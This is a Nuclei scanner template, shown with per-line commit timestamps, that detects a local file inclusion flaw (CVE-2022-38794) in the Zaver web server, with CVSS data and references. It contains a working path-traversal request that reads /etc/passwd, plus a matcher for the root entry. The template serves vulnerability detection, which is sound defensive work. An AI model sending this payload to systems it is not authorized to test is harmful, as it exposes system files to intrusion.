2022-08-28 20:35:50 +00:00
|
|
|
id: CVE-2022-38794
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Zaver - Local File Inclusion
|
|
|
|
author: pikpikcu
|
|
|
|
severity: high
|
|
|
|
description: |
|
2023-01-16 17:41:15 +00:00
|
|
|
Zaver through 2020-12-15 is vulnerable to local file inclusion via the GET /.. substring.
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
This vulnerability can lead to unauthorized access, data leakage, and remote code execution.
|
2023-09-06 11:59:08 +00:00
|
|
|
remediation: |
|
|
|
|
To remediate this vulnerability, ensure that user input is properly validated and sanitized before being used in file inclusion operations.
|
2022-08-28 20:35:50 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/zyearn/zaver/issues/22
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-38794
|
2022-09-12 12:46:04 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cve-id: CVE-2022-38794
|
|
|
|
cwe-id: CWE-22
|
2023-10-14 11:27:55 +00:00
|
|
|
epss-score: 0.0046
|
2023-12-12 11:07:52 +00:00
|
|
|
epss-percentile: 0.72569
|
2023-09-06 11:59:08 +00:00
|
|
|
cpe: cpe:2.3:a:zaver_project:zaver:*:*:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: zaver_project
|
|
|
|
product: zaver
|
2023-12-05 09:50:33 +00:00
|
|
|
tags: cve,cve2022,lfi,zaver,zaver_project
|
2022-08-28 20:35:50 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-08-28 20:35:50 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/../../../../../../../../etc/passwd'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
2022-09-12 11:26:51 +00:00
|
|
|
part: body
|
2022-08-28 20:35:50 +00:00
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-12-29 09:30:44 +00:00
|
|
|
# digest: 4a0a00473045022100d593e552e31a80a94e3a9558203b1df2c4499a9529368d4600acf3bb560be349022014c44af3fbf9fa80a99664f061da65c0b56753dff9f0d5662dd9ece10725b46a:922c64590222798bb761d5b6d8e72950
|